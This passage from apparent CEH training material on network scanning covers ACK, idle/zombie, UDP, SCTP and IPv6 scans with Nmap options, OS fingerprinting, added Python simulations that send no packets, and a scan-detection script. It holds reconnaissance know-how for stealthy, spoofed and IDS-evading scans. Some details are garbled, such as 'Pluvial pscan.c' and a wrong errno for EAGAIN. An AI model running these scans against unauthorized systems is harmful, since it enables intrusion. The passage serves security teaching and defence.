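    port_state: "open", "closed" or "filtered" (a packet filter drops the probe).
    stack: "rfc793" (BSD-derived) or "windows" (assumption: resets every
    inverse-flag probe whatever the port state).
    Returns "SYN/ACK", "RST", "ICMP-unreachable" or None (no reply).
    """
    if port_state == "filtered":
        return None  # this model's filter drops silently
    if probe == "SYN":
        return "SYN/ACK" if port_state == "open" else "RST"
    if probe == "ACK":
        return "RST"  # an unsolicited ACK is reset whether the port is open or closed
    if probe in INVERSE_PROBES:
        if stack == "windows":
            return "RST"
        return None if port_state == "open" else "RST"  # RFC 793 behaviour
    raise ValueError(f"unknown probe {probe!r}")


def infer_state(probe: str, reply: Optional[str]) -> str:
    """Port state a scanner infers from the reply, following the rules in the text."""
    if probe == "SYN":
        return {"SYN/ACK": "open", "RST": "closed"}.get(reply, "filtered")
    if probe == "ACK":
        return "unfiltered" if reply == "RST" else "filtered"
    if probe in INVERSE_PROBES:
        if reply == "RST":
            return "closed"
        if reply == "ICMP-unreachable":
            return "filtered"
        return "open|filtered"  # silence is ambiguous: open, or dropped by a filter
    raise ValueError(f"unknown probe {probe!r}")


def scan_matrix(stack: str) -> dict:
    """Inferred state for every (probe, true state) pair against the given stack."""
    result = {}
    for probe in PROBES:
        for true_state in ("open", "closed", "filtered"):
            reply = target_reply(probe, true_state, stack)
            result[(probe, true_state)] = infer_state(probe, reply)
    return result


if __name__ == "__main__":
    for stack in ("rfc793", "windows"):
        print(f"--- {stack} stack ---")
        for (probe, true_state), inferred in sorted(scan_matrix(stack).items()):
            print(f"{probe:7s} probe, port {true_state:9s} -> scanner infers {inferred}")
```

Against the Windows-like stack every inverse-flag probe yields "closed" for open and closed ports alike, so the matrix makes the text's caveat visible: the inference carries no information there, while the SYN probe still discriminates.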
ACK Flag Probe Scan

Attackers send TCP probe packets with the ACK flag set to a remote device and then analyze the header information (TTL and WINDOW field) of the received RST packets to find out if the port is open or closed. The ACK flag probe scan exploits vulnerabilities within the BSD-derived TCP/IP stack. Thus, such scanning is effective only on those OSs and platforms on which the TCP/IP stack derives from BSD TCP/IP stacks.

Categories of ACK flag probe scanning include:

• TTL-based ACK Flag Probe Scanning
  In this scanning technique, you will first need to send ACK probe packets (several thousands) to different TCP ports and then analyze the TTL field value of the received RST packets. In Zenmap, the syntax nmap -ttl [time] [target] is used to perform a TTL-based scan.

  Figure 3.49: TTL-based ACK flag probe scanning

  If the TTL value of the RST packet on a particular port is less than 64, then that port is open.

  Figure 3.50: Screenshot showing the open port based on the TTL value of the RST packet

  In this example, port 22 returned a TTL value of 50, which is less than 64; all other ports returned a TTL value of 80, which is greater than 64. Therefore, port 22 is open.

• Window-based ACK Flag Probe Scanning
  In this scanning technique, you will first need to send ACK probe packets (several thousands) to different TCP ports and then analyze the window field value of the received RST packets. The user can use this scanning technique when all of the ports return the same TTL value. In Zenmap, the -sW option is used to perform a window scan.

  Figure: ACK probe packets sent to the target host and the RST responses returned
  Figure 3.52: Screenshot showing the open port based on the window value of the RST packet

  The above figure shows that the TTL value returned for each packet is the same; hence, you cannot perform TTL-based ACK flag probe scanning to find the open ports. Therefore, when you observe the window value, the third packet has a non-zero window value, which means that the port is open. When the returned RST value is zero, then the port is closed. If there is no response even after many retransmissions and an ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) is returned, then the port is inferred to be a filtered port.

  Figure 3.53: TCP Window scan result of an open port
  Figure 3.54: TCP Window scan result of closed port

Advantage:
• This type of scan can evade IDS in most cases.

Disadvantages:
• It is extremely slow and can exploit only older OSs with vulnerable BSD-derived TCP/IP stacks.
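The TTL rule and the window rule from the two categories above, applied to constructed RST replies, as an added example that is not part of the EC-Council courseware. Port numbers, TTL and window values are made up to mirror the text's example (port 22 answering with TTL 50, the rest with TTL 80) plus a second host whose RSTs all share one TTL; the fallback from the TTL rule to the window rule when every TTL is the same is the text's own precondition.

```python
"""Added example (not from the EC-Council courseware): the TTL-based and
window-based inference rules for ACK flag probe scanning, run over constructed
RST replies. No packets are sent; the replies are hand-built sample data."""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class RstReply:
    port: int
    ttl: Optional[int]              # None when no RST came back after retransmissions
    window: Optional[int]           # TCP window field of the RST, None when no reply
    icmp_unreachable: bool = False  # ICMP type 3, code 1,2,3,9,10 or 13 received instead


TTL_BOUNDARY = 64  # boundary used by the text's TTL rule


def ttl_rule(replies: List[RstReply]) -> Dict[int, str]:
    """TTL rule on a BSD-derived stack: an RST TTL below the boundary means open."""
    states = {}
    for r in replies:
        if r.icmp_unreachable or r.ttl is None:
            states[r.port] = "filtered"
        elif r.ttl < TTL_BOUNDARY:
            states[r.port] = "open"
        else:
            states[r.port] = "closed"
    return states


def window_rule(replies: List[RstReply]) -> Dict[int, str]:
    """Window rule (nmap -sW): a non-zero window in the RST means open, zero means closed."""
    states = {}
    for r in replies:
        if r.icmp_unreachable or r.window is None:
            states[r.port] = "filtered"
        elif r.window > 0:
            states[r.port] = "open"
        else:
            states[r.port] = "closed"
    return states


def ttl_rule_usable(replies: List[RstReply]) -> bool:
    """If every RST carries the same TTL the TTL rule says nothing (text's precondition)."""
    ttls = {r.ttl for r in replies if r.ttl is not None}
    return len(ttls) > 1


def infer_ack_probe_states(replies: List[RstReply]) -> Dict[int, str]:
    """Apply the TTL rule when it can discriminate, otherwise fall back to the window rule."""
    return ttl_rule(replies) if ttl_rule_usable(replies) else window_rule(replies)


# Constructed replies mirroring the text's TTL example: only port 22 answers with TTL 50.
TTL_EXAMPLE = [
    RstReply(port=21, ttl=80, window=0),
    RstReply(port=22, ttl=50, window=0),
    RstReply(port=25, ttl=80, window=0),
    RstReply(port=80, ttl=80, window=0),
]

# Constructed replies for a host whose RSTs all share one TTL; only the window differs,
# and port 443 answers with an ICMP unreachable error instead of an RST.
WINDOW_EXAMPLE = [
    RstReply(port=21, ttl=64, window=0),
    RstReply(port=22, ttl=64, window=0),
    RstReply(port=80, ttl=64, window=8192),
    RstReply(port=443, ttl=None, window=None, icmp_unreachable=True),
]

if __name__ == "__main__":
    print("TTL example   :", infer_ack_probe_states(TTL_EXAMPLE))
    print("window example:", infer_ack_probe_states(WINDOW_EXAMPLE))
```

On a current stack the RSTs come back with one fixed TTL and a zero window, so both rules report every port closed; that is the disadvantage the text lists, and it is why this scan is only meaningful against the older BSD-derived stacks.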
Checking the Filtering Systems of Target Networks

The ACK flag probe scanning technique also helps in checking the filtering systems of target networks. The attacker sends an ACK probe packet to check the filtering mechanism (firewalls) of packets employed by the target network. Sending an ACK probe packet with a random sequence number and getting no response from the target means that the port is filtered (stateful firewall is present); an RST response from the target means that the port is not filtered (no firewall is present).

Figure: ACK probe packet sent from the attacker to the target host

ACK Flag Probe Scanning using Nmap
In Zenmap, the -sA option is used to perform an ACK flag probe scan.

Figure 3.58: ACK Flag Probe scanning using Zenmap
IDLE/IPID Header Scan

The IDLE/IPID Header scan is a TCP port scan method that you can use to send a spoofed source address to a computer to find out what services are available. It offers complete blind scanning of a remote host. Most network servers listen on TCP ports, such as web servers on port 80 and mail servers on port 25. A port is considered "open" if an application is listening on the port. One way to determine whether a port is open is to send a "SYN" (session establishment) packet to the port. The target machine will send back a "SYN|ACK" (session request acknowledgement) packet if the port is open or an "RST" (Reset) packet if the port is closed. A machine that receives an unsolicited SYN|ACK packet will respond with an RST. An unsolicited RST will be ignored.

Every IP packet on the Internet has a "fragment identification" number (IPID). The OS increases the IPID for each packet sent; thus, probing an IPID gives an attacker the number of packets sent since the last probe. In Zenmap, the -sI option is used to perform the IDLE scan.

Figure 3.59: IDLE/IPID Header scan using Zenmap

The attacker performs this scan by impersonating another computer via spoofing. The attacker does not send a packet from her/his IP address; instead, he/she uses another host, often called a "zombie," to scan the remote host and identify any open ports. In this attack, the attacker expects the sequence numbers of the zombie host, and if the remote host checks the IP of the scanning party, the IP of the zombie machine will be displayed.

IDLE Scan: Step 1

Because the OS increments the IPID number for each packet it sends, probing the IPID can tell an attacker how many packets the host sent since the last probe. The first step in performing an idle scan is to find an appropriate zombie. A zombie that assigns IPID packets incrementally on a global basis is an appropriate or idle zombie for performing the idle scan. The shorter the request/response time interval between the attacker-zombie and the zombie-target, the faster is the scan.

Step 1: Choose a "Zombie" and Probe its Current IP Identification (IPID) Number
In the first step, you will send the SYN+ACK packet to the zombie machine to probe its IPID number. Here, a TCP SYN+ACK probe packet is sent to the zombie to probe the IPID number but not establish the connection (three-way handshake). As the zombie does not expect a SYN+ACK, it responds with an RST packet, which reveals its current IPID.

Figure 3.60: IDLE scan: Step 1

Step 2
The attacker sends a SYN packet to the target machine on port 80, spoofing the IP address of the zombie.

Figure 3.61: Port is open

Since every IP packet has a "fragment identification" number, which increases by one for every packet transmission, the zombie will now use its next available IPID, i.e., 31338 (X+1).

Idle Scan: Step 2.2 (Closed Port)
Assume that the port on the target is closed. Subsequently, on receiving the SYN packet from the attacker (you), the target will respond with an RST, and the zombie will remain idle without taking any further action.

Figure 3.62: Port is closed

Step 3
Now, follow step 1 again to probe the IPID number.

Figure: Step 3, the zombie answers the second SYN+ACK probe with an RST packet carrying IPID 31339; the IPID has incremented by 2 since step 1, so port 80 must be open
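The three steps above as a three-party model (attacker, zombie, target), an added example that is not part of the EC-Council courseware. It is written to show the precondition the text states, that the zombie must assign IPIDs incrementally on a global basis: a zombie modelled with a per-destination IPID counter (the kind of mitigation current stacks apply) answers every port as "closed", so checking one's own hosts for globally incrementing IPIDs is the defensive check this scan motivates. Host roles, ports and the starting IPID 31337 are constructed; nothing is sent on the network.

```python
"""Added example (not from the EC-Council courseware): simulation of the idle scan
steps (probe zombie IPID, spoofed SYN to target, probe zombie again) with two
zombie IPID policies. Everything is in-process; no packets are sent."""
from typing import Dict, Iterable, Set


class Zombie:
    """Host whose IPID policy decides whether it can serve as an idle-scan zombie.

    policy "global-incremental": one counter for all peers (usable zombie).
    policy "per-destination":    one counter per peer (the mitigation).
    """

    def __init__(self, policy: str, start_ipid: int = 31337):
        self.policy = policy
        self.start = start_ipid
        self.counters: Dict[str, int] = {}

    def on_syn_ack(self, peer: str) -> int:
        """Unsolicited SYN/ACK: the zombie answers RST, consuming one IPID it reveals."""
        key = "*" if self.policy == "global-incremental" else peer
        value = (self.counters.get(key, self.start) + 1) & 0xFFFF
        self.counters[key] = value
        return value

    def on_unsolicited_rst(self) -> None:
        """An unsolicited RST is ignored: no packet sent, no IPID consumed."""
        return None


class Target:
    def __init__(self, open_ports: Set[int]):
        self.open_ports = open_ports

    def on_syn(self, port: int, zombie: Zombie) -> None:
        """Step 2: the SYN appears to come from the zombie, so the reply goes to it."""
        if port in self.open_ports:
            zombie.on_syn_ack(peer="target")   # SYN/ACK -> zombie sends RST (IPID used)
        else:
            zombie.on_unsolicited_rst()        # RST -> zombie stays idle


def idle_scan_port(zombie: Zombie, target: Target, port: int) -> str:
    """Steps 1 to 3 from the text; the IPID delta between the two probes gives the state."""
    first = zombie.on_syn_ack(peer="attacker")   # step 1: probe zombie IPID (X)
    target.on_syn(port, zombie)                  # step 2: spoofed SYN, reply lands on zombie
    second = zombie.on_syn_ack(peer="attacker")  # step 3: probe zombie again
    delta = (second - first) & 0xFFFF
    if delta == 2:
        return "open"      # zombie sent one extra packet in between (X+1 used)
    if delta == 1:
        return "closed"    # zombie was idle in between, as far as the attacker can tell
    return "unknown"       # zombie busy with other traffic, or IPIDs not incremental


def idle_scan(zombie: Zombie, target: Target, ports: Iterable[int]) -> Dict[int, str]:
    return {p: idle_scan_port(zombie, target, p) for p in ports}


if __name__ == "__main__":
    tgt = Target(open_ports={80})
    print("global-incremental zombie:", idle_scan(Zombie("global-incremental"), tgt, [22, 80, 443]))
    print("per-destination zombie   :", idle_scan(Zombie("per-destination"), tgt, [22, 80, 443]))
```

With the per-destination zombie the RST it sends to the target draws from a counter the attacker never sees, so port 80 is reported closed even though it is open; the scan is defeated without any firewall change on the target.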
UDP Scanning

UDP Raw ICMP Port Unreachable Scanning

UDP port scanners use the UDP protocol instead of TCP. There is no three-way handshake for the UDP scan. The UDP protocol can be more challenging to use than TCP scanning because you can send a packet but you cannot determine whether the host is alive, dead, or filtered. However, you can use one ICMP that checks for open or closed ports. If you send a UDP packet to a port without an application bound to it, the IP stack will return an ICMP port unreachable packet. If any port returns an ICMP error, it will be closed, leaving the ports that did not answer if they are open or filtered through the firewall.

Figure 3.64: UDP scanning

This happens because open ports do not have to send an acknowledgement in response to a probe, and closed ports are not even required to send an error packet.

UDP Packets

Source: https://nmap.org

When you send a packet to a closed UDP port, most of the hosts send an ICMP_PORT_UNREACH error. Thus, you can determine whether a port is not open. UDP packets or ICMP errors are not guaranteed to arrive. Thus, UDP scanners of this type must implement retransmission of packets.

Figure 3.65: UDP scanning using Zenmap

In addition, this scanning technique is slow because it limits the ICMP error message rate as a form of compensation to machines that apply RFC 1812 section 4.3.2.8. A remote host will require access to the raw ICMP socket to distinguish closed ports from unreachable ports.

UDP RECVFROM() and WRITE() Scanning

Although non-root users cannot read unreachable port errors directly, Linux informs you indirectly when it receives messages.

• Example: For example, a second write() call to a closed port will usually fail. Various scanners, such as Netcat and Pluvial pscan.c, perform recvfrom() on non-blocking UDP sockets, and they usually return EAGAIN ("Try Again," errno 13) if the ICMP error has not been received or ECONNREFUSED ("Connection refused," errno 111) otherwise. This technique is used for determining open ports when non-root users use -u (UDP).

Advantage:
• Root users can also use the -l (lamer UDP scan) option to force this process.
• The UDP scan is less informal with regard to an open port because there is no overhead of the TCP handshake. However, if ICMP is responding to each unavailable port, the total number of frames can exceed that from a TCP scan. Microsoft-based OSs do not usually implement any ICMP rate limiting; hence, this scan operates very efficiently on Windows-based devices.

Disadvantage:
• The UDP scan provides port information only. If additional information of the version is needed, the scan must be supplemented with a version detection scan (-sV) or the OS fingerprinting option (-O).
• The UDP scan requires privileged access; hence, this scan option is only available on systems with the appropriate user permissions.
SCTP INIT Scanning

Stream Control Transport Protocol (SCTP) is a reliable message-oriented transport layer protocol. It is used as an alternative to the TCP and UDP protocols, as its characteristics are similar to those of TCP and UDP. SCTP is specifically used to perform multi-homing and multi-streaming activities. Some SCTP applications include discovering VoIP, IP telephony, and Signaling System 7/SIGnaling TRANsport (SS7/SIGTRAN)-related services. An SCTP association comprises a four-way handshake method, as shown in the screenshot below.

Figure: SCTP four-way handshake

In SCTP, the INIT scan is performed quickly by scanning thousands of ports per second on a fast network not obstructed by a firewall, offering a stronger sense of security. The SCTP INIT scan is very similar to the TCP SYN scan; comparatively, it is also stealthy and unobtrusive, as it cannot complete SCTP associations, hence making the connection half-open. Attackers send an INIT chunk to the target host. If the port is listening or open, it sends an acknowledgement as an INIT+ACK chunk.

Figure 3.67: SCTP INIT scan result when a port is listening (Open)

If the target is inactive and it is not listening, then it sends an acknowledgement as an ABORT chunk.

Figure 3.68: SCTP INIT scan result (ABORT chunk)

After several retransmissions, if there is no response, then the port is indicated as a filtered port. The port is also indicated as a filtered port if the target server responds with an ICMP unreachable exception (type 3, code 0, 1, 2, 3, 9, 10, or 13). In Zenmap, the -sY option is used to perform the SCTP INIT scan.

Advantages:
• INIT scan can clearly differentiate between various port states such as open, closed, and filtered.

Figure 3.69: SCTP INIT scan in Zenmap

Module 03 Page 307
SCTP COOKIE ECHO Scanning

SCTP COOKIE ECHO scan is a more advanced type of scan. In this type of scan, attackers send the COOKIE ECHO chunk to the target, and if the target port is open, it will silently drop the packets onto the port and you will not receive any response from the target. If the target sends back the ABORT chunk response, then the port is considered as a closed port. The COOKIE ECHO chunk is not blocked by non-stateful firewall rulesets as in the INIT scan. Only an advanced IDS can detect the SCTP COOKIE ECHO scan. In Zenmap, the -sZ option is used to perform the SCTP COOKIE ECHO scan.

Figure 3.70: SCTP COOKIE ECHO scan result when port is open
Figure 3.71: SCTP COOKIE ECHO scan result when port is closed

Advantages:
• The port scan is not as conspicuous as the INIT scan.

Disadvantages:
• SCTP COOKIE ECHO scan cannot differentiate clearly between open and filtered ports, and it shows the output as open|filtered in both cases.

Figure 3.72: SCTP COOKIE-ECHO scan in Zenmap
SSDP and List Scanning

SSDP Scanning

The SSDP service will respond to a query sent to it with information about the UPnP or IPv6 addresses associated with it. This response uses broadcast over IPv4. The attacker uses the SSDP scanning feature to detect UPnP vulnerabilities that may allow him/her to launch buffer overflow or DoS attacks.

Figure 3.73: UPnP SSDP M-SEARCH in Parco Security

List Scanning

Figure 3.74: List scan using Zenmap

Advantages:
• A list scan can perform a good sanity check.
• The list scan detects incorrectly defined IP addresses in the command line or option file. It primarily repairs the detected errors to run any "active" scan.
IPv6 Scanning

IPv6 increases the size of the IP address space from 32 bits to 128 bits to support higher levels of the addressing hierarchy. Traditional network scanning techniques are computationally less feasible because of the larger search space (64 bits of host address space, or 2^64 addresses) provided by IPv6 in a subnet. Scanning the IPv6 network is more difficult and complex compared to IPv4. Additionally, a number of scanning tools do not support ping sweeps on IPv6 networks.

Attackers need to harvest IPv6 addresses from network traffic, recorded logs, or "Received from" and other header lines in archived email or Usenet news messages to identify IPv6 addresses for subsequent port scanning. However, scanning an IPv6 network provides a large number of hosts in a subnet; if an attacker can compromise one host in the subnet, he/she can probe the "all hosts" link local multicast address or use any regular scheme if the host numbers are sequential. An attacker needs to analyze 2^64 addresses to verify if a particular open service is running on a host in that subnet. At a conservative rate of one probe per second, such a scan would take about 5 billion years to complete.

Attackers use Nmap to perform IPv6 scanning. In Zenmap, the -6 option is used to perform the IPv6 scan.

Figure 3.75: IPv6 Scan in Zenmap
Service Version Discovery

Service version discovery helps attackers obtain information about the running services and their versions on a target system, which allows them to determine the particular exploits to use against it (for example, a WannaCry ransomware attack in combination with the EternalBlue and DoublePulsar backdoor in Metasploit).

The version detection technique of Nmap is nothing but the examination of the various TCP and UDP services. The nmap-service-probes database is used for querying various services and matching expressions for recognizing and parsing responses. In Zenmap, the -sV option is used to detect service versions.

Figure: Service version detection (nmap -sV 10.10.10.10) in Zenmap

Module 03 Page 245
Nmap Scan Time Reduction Techniques

In Nmap, performance and accuracy take high priority, and this can be achieved only by reducing the long scan time. The important techniques for reducing the scan time are as follows:

• Omit Non-critical Tests
  While performing the Nmap scan, the time complexity can be reduced by the following methods:
  o Avoiding an intense scan if only a minimal amount of information is required.
  o The number of ports scanned can be limited using specific commands.
  o The port scan (-sn) can be skipped if and only if one has to check whether the hosts are online or not.
  o Advanced scan types (-sC, -sV, --traceroute, and -A) can be avoided.
  o The DNS resolution should be turned on only when it is necessary.

• Optimize Timing Parameters
  Nmap provides the -T option for scanning, ranging from high-level to low-level timing aggressiveness. This can be extremely useful for scanning highly filtered networks.

• Separate and Optimize UDP Scans
  As many vulnerable services use the UDP protocol, scanning the UDP protocol is vital, and it should be scanned separately, as TCP scans have different performance requirements and timing characteristics. Moreover, the UDP scan is more affected by the ICMP error rate-limiting compared to the TCP scan.

• Upgrade Nmap
  It is always advisable to use the upgraded version of Nmap as it contains many bug fixes, important algorithmic enhancements, and high-performance features such as local network ARP scanning.

• Execute Concurrent Nmap Instances
  Running Nmap against the whole network usually makes the system slower and less efficient. Nmap supports parallelization, and it can also be customized according to specific needs. It becomes very efficient by getting an idea of the reliability of the network while scanning a larger group. The overall speed of the scan can be improved by dividing the network into many groups and running them simultaneously.

• Scan from a Favorable Network Location
  It is always advisable to run Nmap from the local network when performing the target host's internal network scan, as it offers defense-in-depth security. External scanning is obligatory when performing firewall testing or when the network should be monitored from the external attacker's viewpoint.

• Increase Available Bandwidth and CPU Time
  By increasing the available bandwidth or CPU power, the Nmap scan time can be reduced. This is done by installing a new data line or stopping any running applications. Nmap can be controlled by its own congestion control algorithms, so that network flooding can be prevented. This improves its accuracy. The Nmap bandwidth usage can be tested by running it in the verbose mode -v.
Port Scanning Countermeasures
As previously discussed, port scanning provides a large amount of useful information to the attacker, such as IP addresses, hostnames, open ports, and services running on ports. Open ports specifically offer an easy means for the attacker to break into the network. However, there is no cause for concern, provided that you secure your system or network against port scanning by adopting the following countermeasures:
- Configure firewall and IDS rules to detect and block probes.
- The firewall should be capable of detecting probes sent by attackers using port scanning tools. It should not allow traffic to pass through it after simply inspecting the TCP header. The firewall should be able to examine the data contained in each packet before allowing the traffic to pass through it.
- Run the port scanning tools against hosts on the network to determine whether the firewall accurately detects the port scanning activity.
- Some firewalls do a better job than others in terms of detecting stealth scans. For example, many firewalls have specific options to detect SYN scans, while others completely ignore FIN scans.
- Ensure that the router, IDS, and firewall firmware are updated with their latest releases/versions.
- Configure commercial firewalls to protect your network against fast port scans and SYN floods. You can run tools such as PortSentry to detect and stop port scan attempts on Linux/UNIX systems.
- Hackers use tools such as Nmap and perform OS detection to sniff the details of a remote OS. Thus, it is important to employ intrusion detection systems in such cases. Snort (https://www.snort.org) is an intrusion detection and prevention technology that is very useful, mainly because signatures are frequently available from the public authors.
- Keep as few ports open as possible and filter the rest, as the intruder will try to enter through any open port. Use a custom rule set to lock down the network, block unwanted ports at the firewall, and filter the following ports: 135-159, 256-258, 389, 445, 1080, 1745, and 3268.
- Block unwanted services running on the ports and update the service versions.
- Ensure that the versions of services running on the ports are non-vulnerable.
- Block inbound ICMP message types and all outbound ICMP type-3 unreachable messages at border routers arranged in front of a company's main firewall.
- Attackers try to perform source routing and send packets to targets (which may not be reachable via the Internet) using an intermediate host that can interact with the target. Hence, it is necessary to ensure that your firewall and router can block such source-routing techniques.
- Ensure that the mechanisms used for routing and filtering at the routers and firewalls, respectively, cannot be bypassed using a particular source port or source-routing methods.
- Test your IP address space using TCP and UDP port scans as well as ICMP probes to determine the network configuration and accessible ports.
- Ensure that the anti-scanning and anti-spoofing rules are configured.
- If a commercial firewall is in use, then ensure that
  o It is patched with the latest updates
  o It has correctly defined anti-spoofing rules
  o Its fast mode services are unusable in Check Point Firewall-1 environments
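The first countermeasure above (detect probes with firewall/IDS rules) is usually implemented as a threshold over denied connections. The following Python sketch is an added example, not code from the courseware or from PortSentry/Snort: it reads a handful of constructed firewall deny-log lines (the log format, the threshold of 8 distinct ports, and the 60-second window are all assumptions) and flags any source that touches that many distinct destination ports on one host within the window, which is the signature of a vertical port scan.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (syslog-like, not from any real firewall product):
# "<date> <time> DENY <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port>"
SAMPLE_LOG = """\
2019-06-10 11:03:01 DENY TCP 10.10.10.16:40001 -> 10.10.10.10:21
2019-06-10 11:03:01 DENY TCP 10.10.10.16:40002 -> 10.10.10.10:22
2019-06-10 11:03:01 DENY TCP 10.10.10.16:40003 -> 10.10.10.10:23
2019-06-10 11:03:02 DENY TCP 10.10.10.16:40004 -> 10.10.10.10:25
2019-06-10 11:03:02 DENY TCP 10.10.10.16:40005 -> 10.10.10.10:80
2019-06-10 11:03:02 DENY TCP 10.10.10.16:40006 -> 10.10.10.10:135
2019-06-10 11:03:03 DENY TCP 10.10.10.16:40007 -> 10.10.10.10:139
2019-06-10 11:03:03 DENY TCP 10.10.10.16:40008 -> 10.10.10.10:443
2019-06-10 11:03:03 DENY TCP 10.10.10.16:40009 -> 10.10.10.10:445
2019-06-10 11:03:04 DENY TCP 10.10.10.16:40010 -> 10.10.10.10:3389
2019-06-10 11:03:05 DENY UDP 192.168.0.7:5353 -> 10.10.10.10:53
2019-06-10 11:09:30 DENY TCP 192.168.0.7:51000 -> 10.10.10.10:8080
"""


def parse_line(line):
    """Split one assumed-format log line into its fields."""
    date, time, action, proto, src, _arrow, dst = line.split()
    src_ip, _src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {
        "ts": datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S"),
        "action": action,
        "proto": proto,
        "src_ip": src_ip,
        "dst_ip": dst_ip,
        "dst_port": int(dst_port),
    }


def detect_port_scans(log_text, threshold=8, window=timedelta(seconds=60)):
    """Return {(src_ip, dst_ip): sorted distinct ports} for every source that
    was denied on at least `threshold` distinct ports of one host inside a
    sliding `window`. Two hits from the same source on 2 ports are noise;
    10 ports in 4 seconds is a scan."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    events.sort(key=lambda e: e["ts"])
    history = defaultdict(list)  # (src, dst) -> [(ts, dst_port), ...]
    alerts = {}
    for e in events:
        if e["action"] != "DENY":
            continue
        key = (e["src_ip"], e["dst_ip"])
        cutoff = e["ts"] - window
        # keep only entries still inside the window, then add this one
        recent = [(t, p) for (t, p) in history[key] if t >= cutoff]
        recent.append((e["ts"], e["dst_port"]))
        history[key] = recent
        distinct = {p for _, p in recent}
        if len(distinct) >= threshold:
            alerts[key] = sorted(distinct)  # keeps growing as the scan continues
    return alerts


if __name__ == "__main__":
    for (src, dst), ports in detect_port_scans(SAMPLE_LOG).items():
        print(f"port scan: {src} -> {dst}, {len(ports)} ports: {ports}")
```

The same counting logic, applied to SYN-only or FIN-only flows instead of firewall denies, is how an IDS distinguishes a stealth scan from ordinary failed connections; the threshold and window should be tuned per network so that a busy legitimate client is not flagged.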
Module Flow: OS Discovery (Banner Grabbing/OS Fingerprinting)

An attacker uses OS discovery or banner grabbing techniques to identify the OS and application versions running on network hosts, and their types, which can then be matched with known exploits. This section introduces you to banner grabbing and its tools, as well as useful countermeasures that you can adopt against it.
OS Discovery/Banner Grabbing
Banner grabbing, or "OS fingerprinting," is a method used to determine the OS that is running on a remote target system. It is an important scanning method, as the attacker will have a higher probability of success if the OS of the target system is known (many vulnerabilities are OS-specific). The attacker can then formulate an attack strategy based on the OS of the target system.
There are two methods for banner grabbing: spotting the banner while trying to connect to a service, such as an FTP site, and downloading the binary file /bin/ls to check the system architecture.
A more advanced fingerprinting technique depends on stack querying, which sends packets to the network host and evaluates the reply. ICMP response analysis is another method used to fingerprint an OS. It consists of sending ICMP messages to a remote host and evaluating the reply.
Two types of banner grabbing techniques are described below:
- Active Banner Grabbing
Active banner grabbing applies the principle that an OS's IP stack has a unique way of responding to specially crafted TCP packets. This happens because of the different interpretations that vendors apply while implementing the TCP/IP stack on a particular OS. In active banner grabbing, the attacker sends a variety of malformed packets to the remote host, and the responses are compared with a database. Responses from different OSs vary because of differences in TCP/IP stack implementation. For instance, the scanning utility Nmap uses a series of nine tests to determine an OS fingerprint or banner grabbing.
The tests listed below provide some insights into an active banner grabbing attack, as described at www.packetwatch.net:
  o Test 1: A TCP packet with the SYN and ECN-Echo flags enabled is sent to an open TCP port.
  o Test 2: A TCP packet with no flags enabled is sent to an open TCP port. This type of packet is a NULL packet.
  o Test 3: A TCP packet with the URG, PSH, SYN, and FIN flags enabled is sent to an open TCP port.
  o Test 4: A TCP packet with the ACK flag enabled is sent to an open TCP port.
  o Test 5: A TCP packet with the SYN flag enabled is sent to a closed TCP port.
  o Test 6: A TCP packet with the ACK flag enabled is sent to a closed TCP port.
  o Test 7: A TCP packet with the URG, PSH, and FIN flags enabled is sent to a closed TCP port.
  o Test 8 PU (Port Unreachable): A UDP packet is sent to a closed UDP port. The objective is to extract an "ICMP port unreachable" message from the target machine.
  o Test 9 TSeq (TCP Sequenceability test): This test tries to determine the sequence generation patterns of the TCP initial sequence numbers (also known as TCP ISN sampling), the IP identification numbers (also known as IPID sampling), and the TCP timestamp numbers. It sends six TCP packets with the SYN flag enabled to an open TCP port.
The objective of these tests is to find patterns in the initial sequence numbers that the TCP implementations chose while responding to a connection request. They can be categorized into groups, such as traditional 64K (many old UNIX boxes), random increments (newer versions of Solaris, IRIX, FreeBSD, Digital UNIX, Cray, and many others), or true random (Linux 2.0.*, OpenVMS, newer AIX, etc.). Windows boxes use a "time-dependent" model in which the ISN is incremented by a fixed amount for each occurrence.
Note that this nine-test sequence describes Nmap's first-generation OS detection; current Nmap releases use a second-generation engine with a different probe set (sequence-generation probes, ECN, T1-T7, U1, and IE), documented at https://nmap.org/book/osdetect.html.
- Passive Banner Grabbing
Source: https://www.symantec.com
Like active banner grabbing, passive banner grabbing also depends on the differential implementation of the stack and the various ways in which an OS responds to packets. However, instead of relying on scanning the target host, passive fingerprinting captures packets from the target host via sniffing to study telltale signs that can reveal an OS.
Passive banner grabbing includes:
  o Banner grabbing from error messages: Error messages provide information, such as the type of server, the type of OS, and the SSL tools used by the target remote system.
  o Sniffing the network traffic: Capturing and analyzing packets from the target enables an attacker to determine the OS used by the remote system. The following four signatures are examined:
    - TTL: What does the OS set as the Time to Live on the outbound packet?
    - Window Size: What is the window size set by the OS?
    - Whether the DF (Don't Fragment) bit is set: Does the OS set the DF bit?
    - TOS (Type of Service): Does the OS set the TOS, and if so, what setting is it?
Passive fingerprinting is neither fully accurate nor limited to these four signatures. However, one can improve its accuracy by looking at several signatures and combining the information. The following is an analysis of a sniffed packet described by Lance Spitzner in his paper on passive fingerprinting (https://www.symantec.com/connect/articles/passive-fingerprinting):

04/20-21:41:48.129662 129.142.224.3:659 -> 172.16.1.107:604
TCP TTL:45 TOS:0x0 ID:56257 DF
***PS*A* Seq: 0x9DD90553 Ack: 0xE3C65D7 Win: 0x7D78
According to the four criteria, the following are identified:
  o TTL: 45
  o Window Size: 0x7D78 (or 32120 in decimal)
  o DF: The DF bit is set
  o TOS: 0x0
Compare this information with a database of signatures.
  o TTL: The TTL from the analysis is 45. The packet went through 19 hops to get to the target, so it appears that the original TTL was set to 64. Based on this TTL, the packet was sent from a Linux or FreeBSD box (however, more system signatures need to be added to the database). This TTL can be confirmed by implementing a traceroute to the remote host. If the trace needs to be performed stealthily, the traceroute TTL (default 30 hops) can be set to one or two hops fewer than the remote host (-m option). Setting the traceroute in this manner reveals the path information (including the upstream provider) without actually contacting the remote host.
